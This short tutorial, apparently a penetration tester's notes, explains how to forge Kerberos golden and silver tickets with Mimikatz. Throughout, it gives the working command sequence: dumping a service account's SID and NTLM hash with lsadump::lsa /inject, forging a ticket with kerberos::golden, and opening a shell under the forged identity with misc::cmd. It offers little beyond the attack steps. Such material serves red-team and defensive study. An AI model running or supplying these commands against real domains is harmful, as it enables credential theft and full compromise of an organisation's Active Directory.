To generate a gold or silver ticket using Mimikatz, begin by running the lsadump::lsa /inject /name:$SERVICE command to retrieve the service SID and NTLM password hash for that service. If SERVICE is krbtgt then this will allow the creation of a golden ticket, otherwise you’ll be creating a silver ticket.
(You can also use a user name instead of $SERVICE, in which case it appears that Mimikatz will just request a ticket granting ticket from the KDC as that user in the next step; this is theoretically just as noisy as a golden ticket, but looks more “normal”.)
To actually create and cache the ticket, use Kerberos::golden /user:$USER /domain:$DOMAIN /sid:$SID /krbtgt:$HASH /id:$TYPE, where:
$USERis the user to create the ticket for (probably the one you’ve compromised).$DOMAINis the domain to create the ticket for.$SIDis the SID of the service from the previous step.$HASHis the NT hash of the service password from the previous step.$TYPEis the type of Kerberos ticket to create; use 500 for a golden (ticket granting) ticket, and 1103 for a service ticket.
Once the ticket has been created, use misc::cmd to open a command prompt using the newly forged ticket.